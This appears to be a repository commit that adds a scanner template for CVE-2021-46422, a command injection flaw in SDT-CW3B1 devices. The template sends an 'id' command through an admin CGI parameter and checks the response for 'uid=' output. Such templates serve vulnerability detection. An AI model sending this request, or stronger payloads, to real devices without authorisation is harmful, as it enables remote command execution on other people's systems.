Create CVE-2021-46422.yaml
parent
7c4cd8d453
commit
f263e723c2
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2021-46422
|
||||
|
||||
info:
|
||||
name: SDT-CW3B1 1.1.0 - OS command injection
|
||||
author: remote
|
||||
severity: high
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46422
|
||||
- https://www.exploit-db.com/exploits/50936
|
||||
tags: cve,cve2021
|
||||
classification:
|
||||
cve-id: CVE-2021-46422
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{RootURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{exploit}}"
|
||||
|
||||
payloads:
|
||||
exploit:
|
||||
- "id"
|
||||
attack: pitchfork
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "uid=.*"
|
Loading…
Reference in New Issue